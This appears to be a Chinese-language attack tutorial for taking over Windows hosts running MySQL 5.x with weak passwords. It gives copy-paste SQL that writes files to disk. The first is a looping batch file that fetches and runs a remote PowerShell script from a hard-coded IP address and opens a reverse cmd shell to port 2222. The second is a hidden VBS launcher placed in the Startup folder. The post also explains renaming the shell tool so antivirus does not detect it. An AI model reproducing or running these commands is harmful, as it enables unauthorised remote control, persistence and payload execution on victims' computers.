大多数人mysql密码是123456 这个时候如果还开放了该端口 可就危险了
- 需要运行的是5.x版本的mysql (一般老师教学都是这个版本)
- 对比网上powercat 脚本多了步把powercat替换成nn命令(需要的可以问我),这样windows就无法检测出病毒,同时使用vbs 来运行bat也使得用户不易察觉。 注意以下是将病毒植入开机启动程序,需要开机时才能启动
服务器需要做的事
- 将脚本上传到客户端可以访问的地方(如启动自带的aphacl,将脚本添加到index.html文件的链接里)
- 服务器启动
nc -l 2222
如果没有这条命令可以自行百度安装
然后登录目标mysql (复制粘贴)
create database te;
use te;
create table bat(text varchar(200));
create table vbs(text varchar(200));
insert into bat value(':start
powershell IEX (New-Object System.Net.Webclient).DownloadString(\'http://111.229.235.155/windows.ps1#这里将ps1脚本替换成你的ps1脚本\');nn -c 111.229.235.155(你的服务器ip) -p 2222 -e cmd
timeout 60
goto start');
select*from bat into outfile "C:\\Windows\\wins.bat" FIELDS ESCAPED BY "`" lines terminated by '\r\n';
insert into vbs value('createobject("wscript.shell").run "C:\\Windows\\wins.bat",0');
select*from vbs into outfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\\Programs\\StartUp\\wins.vbs" FIELDS ESCAPED BY "`" lines terminated by '\r\n';
drop table bat;
drop table vbs;
drop database te;